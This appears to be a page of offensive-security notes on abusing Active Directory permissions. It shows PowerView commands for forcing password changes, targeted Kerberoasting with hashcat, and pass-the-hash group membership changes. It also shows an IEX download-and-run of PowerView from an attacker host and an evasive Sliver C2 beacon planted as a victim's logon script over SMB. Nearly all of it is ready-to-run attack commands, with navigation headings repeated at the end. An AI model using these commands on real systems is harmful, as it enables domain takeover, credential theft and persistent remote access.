ACLs Abuse

ForcePasswordChange on User

1) Use Powerview, we'll base64 encode the below - Password for nina will be Password123!

Set-DomainUserPassword -Identity user -AccountPassword $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c U2V0LURvbWFpblVzZXJQYXNzd29yZCAtSWRlbnRpdHkgdXNlciAtQWNjb3VudFBhc3N3b3JkICQoQ29udmVydFRvLVNlY3VyZVN0cmluZyAnUGFzc3dvcmQxMjMhJyAtQXNQbGFpblRleHQgLUZvcmNlKQ==

2) Check if shaun's password has been changed

sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainUser -Identity user | select pwdlastset"'

GenericWrite on User

Two things can be done

Add SPN and Kerberoast
Change login script (check login frequency of the user)

Set SPN and perform kerberoasting

1) Check all properties of user

sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainUser user | select lastlogon"'

2) Set SPN to pwned/service on user

Set-DomainObject -Identity user -SET @{serviceprincipalname='pwned/service'}
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c U2V0LURvbWFpbk9iamVjdCAtSWRlbnRpdHkgdXNlciAtU0VUIEB7c2VydmljZXByaW5jaXBhbG5hbWU9J3B3bmVkL3NlcnZpY2UnfQ==

3) Get hash for the user based on set SPN

sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSPNTicket -SPN pwned/service -OutputFormat Hashcat | fl"'

4) Try and crack hashes using hashcat

hashcat -m 13100 -a 0 user.hash /usr/share/wordlists/rockyou.txt -w 3 -O

Change login script

1) This needs to be an executable or can be a .bat file containing powershell oneliner

generate beacon --http 10.10.10.11:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion

impacket-smbserver -smb2support myshare .

3) Set the scriptpath attribute to .exe file

Set-DomainObject -Identity user -SET @{scriptpath='\\10.10.10.11\myshare\sliver.obfuscated.exe'}
sharpsh -t 20 -- -u http://10.10.10.11/powershell-scripts/PowerView.ps1 -e -c U2V0LURvbWFpbk9iamVjdCAtSWRlbnRpdHkgdXNlciAtU0VUIEB7c2NyaXB0cGF0aD0nXFwxMC4xMC4xMC4xMVxteXNoYXJlXHNsaXZlci5vYmZ1c2NhdGVkLmV4ZSd9

WriteDacl on Group

The user attacker can writedacl on admins group and add users within it

Windows

1) Load script

shell
powershell -ep bypass
IEX((new-object net.webclient).downloadstring('http://10.10.10.11/powershell-scripts/PowerView.ps1'))

2) WriteMembers does not work for some reason, use All instead

Add-DomainObjectAcl -TargetIdentity admins -PrincipalIdentity attacker -Rights WriteMembers
Add-DomainObjectAcl -TargetIdentity admins -PrincipalIdentity attacker -Rights All
sharpsh -t 20 -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -e -c QWRkLURvbWFpbk9iamVjdEFjbCAtVGFyZ2V0SWRlbnRpdHkgYWRtaW5zIC1QcmluY2lwYWxJZGVudGl0eSBhdHRhY2tlciAtUmlnaHRzIEFsbA==

3) Add the user into admins

Add-DomainGroupMember -Identity 'admins' -Members 'attacker'
sharpsh -t 20 -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -e -c QWRkLURvbWFpbkdyb3VwTWVtYmVyIC1JZGVudGl0eSAnYWRtaW5zJyAtTWVtYmVycyAnYXR0YWNrZXIn

4) Check the group members if user is now part of it

Get-DomainGroupMember -Identity admins
sharpsh -t 20 -- -u 'http://10.10.10.11/powershell-scripts/PowerView.ps1' -e -c R2V0LURvbWFpbkdyb3VwTWVtYmVyIC1JZGVudGl0eSBhZG1pbnM=

Linux

1) Add ACL for write permissions on the group admins for attacker

proxychains impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'attacker' -target 'admins' 'domain.com'/'attacker' -hashes ':12345678912345678912345678912345'

2) Use PTH NET to add the user account into attacker

proxychains pth-net rpc group addmem "admins" "attacker" -U "domain.com"/"attacker"%"ffffffffffffffffffffffffffffffff":"12345678912345678912345678912345" -S "dc02.domain.com"

3) Verify if the user account has been added

proxychains pth-net rpc group members "admins" -U "domain.com"/"attacker"%"ffffffffffffffffffffffffffffffff":"12345678912345678912345678912345" -S "dc02.domain.com"

PreviousAD Exploitation NextKerberoasting

Last updated 5 months ago

hashtagForcePasswordChange on User

hashtag1) Use Powerview, we'll base64 encode the below - Password for nina will be Password123!

hashtag2) Check if shaun's password has been changed

hashtagGenericWrite on User

hashtag1) Check all properties of user

hashtag2) Set SPN to pwned/service on user

hashtag3) Get hash for the user based on set SPN

hashtag4) Try and crack hashes using hashcat

hashtag1) This needs to be an executable or can be a .bat file containing powershell oneliner

hashtag2) Setup share

hashtag3) Set the scriptpath attribute to .exe file

hashtagWriteDacl on Group

hashtagWindows

hashtag1) Load script

hashtag2) WriteMembers does not work for some reason, use All instead

hashtag3) Add the user into admins

hashtag4) Check the group members if user is now part of it

hashtagLinux

hashtag1) Add ACL for write permissions on the group admins for attacker

hashtag2) Use PTH NET to add the user account into attacker

hashtag3) Verify if the user account has been added

ForcePasswordChange on User

1) Use Powerview, we'll base64 encode the below - Password for nina will be Password123!

2) Check if shaun's password has been changed

GenericWrite on User

1) Check all properties of user

2) Set SPN to pwned/service on user

3) Get hash for the user based on set SPN

4) Try and crack hashes using hashcat

1) This needs to be an executable or can be a .bat file containing powershell oneliner

2) Setup share

3) Set the scriptpath attribute to .exe file

WriteDacl on Group

Windows

1) Load script

2) WriteMembers does not work for some reason, use All instead

3) Add the user into admins

4) Check the group members if user is now part of it

Linux

1) Add ACL for write permissions on the group admins for attacker

2) Use PTH NET to add the user account into attacker

3) Verify if the user account has been added